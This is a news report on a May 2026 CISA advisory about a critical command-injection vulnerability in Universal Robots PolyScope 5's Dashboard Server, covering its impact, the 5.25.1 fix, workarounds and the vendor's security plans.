CISA published an industrial control systems advisory on May 14, 2026, warning that Universal Robots PolyScope 5 versions before 5.25.1 contain a critical command-injection flaw allowing an unauthenticated network attacker to execute code on a robot controller. Vera Mens of Claroty Team82 discovered and reported the vulnerability, which was coordinated through CISA and CERT/CC's VINCE platform. Universal Robots has deployed more than 100,000 cobots across thousands of companies in the United States, Mexico, Europe, and the Asia-Pacific, putting manufacturers on notice globally.

Background

Universal Robots, a Danish company specializing in collaborative industrial robots (cobots), has patched a critical vulnerability in PolyScope 5, the operating system and graphical user interface that powers and controls the company's cobots. The Dashboard Server interface allows external systems to communicate with the robot controller over the network, enabling automation cells, supervisory systems, and custom integrations to issue commands. Customers may use this interface "to deliver information to a central management unit, to use legacy field protocols such as MODBUS and EtherNet/IP to manipulate other OT equipment, or to control the cobot remotely," according to Claroty's Mens.

The advisory follows similar warnings about Kuka, ABB, and Fanuc systems over the past two years, underscoring a broader pattern of security vulnerabilities surfacing in connected industrial robotics platforms as OT environments become increasingly networked.

Details

CVE-2026-8153 carries a CVSS 3.1 base score of 9.8 (Critical) and a CVSS 4.0 base score of 9.3. Universal Robots PolyScope 5 versions prior to 5.25.1 are affected. The Dashboard Server accepts user-controlled input and passes it to the underlying operating system without proper neutralization of special elements, allowing an unauthenticated attacker with network access to the Dashboard Server port to craft commands executed on the robot's operating system. This leads to remote code execution and full compromise of the controller, with high impact to confidentiality, integrity, and availability.

Successful exploitation grants complete control over the robot controller, including the ability to alter safety configurations, steal sensitive production data, or manipulate physical robot movements. Security professionals warned that attackers could also use a compromised controller as a pivot point to reach other systems on the network.

Although OT networks are generally not publicly exposed, they are often flat and lack proper segmentation, meaning an initial foothold may not be difficult to obtain, Claroty's Mens told SecurityWeek. The vendor noted that remote exploitation requires the robot's Dashboard Server to be enabled in the UI and its port to be reachable by the attacker. No known public exploitation targeting this vulnerability had been reported to CISA at the time of publication.

A fix is available in the PolyScope 5.25.1 software update, and Universal Robots strongly recommends that all customers update to version 5.25.1 or newer as soon as possible. For sites unable to patch immediately, Universal Robots advised disabling the Dashboard Server if it is not required and restricting access to trusted hosts or subnets. A temporary workaround involves editing the polyscope.conf file to set ENABLE_REMOTE_EXECUTE=0 and restarting the service, though this disables the vulnerable endpoint entirely and may break automation workflows that rely on remote program start.

CISA advises asset owners to segment OT networks from IT and the internet using demilitarized zones (DMZs) and to implement network monitoring to detect exploits, noting that IDS signatures for CVE-2026-8153 are already available in Suricata and Snort rule sets.

Outlook

Universal Robots has committed to a quarterly security update cadence starting in Q3 2026 and is expanding its bug bounty program via HackerOne. The advisory falls under CISA's expanded authority following the 2025 Critical Infrastructure Cybersecurity Act, which mandates reporting and prompt action for vulnerabilities in operational technology. For manufacturing operations running UR-series cobots in multi-vendor automation cells, security and operations teams face immediate pressure to reconcile patch timelines with production uptime constraints - particularly where change-management processes require pre-production validation before applying any software update to a live robotic cell.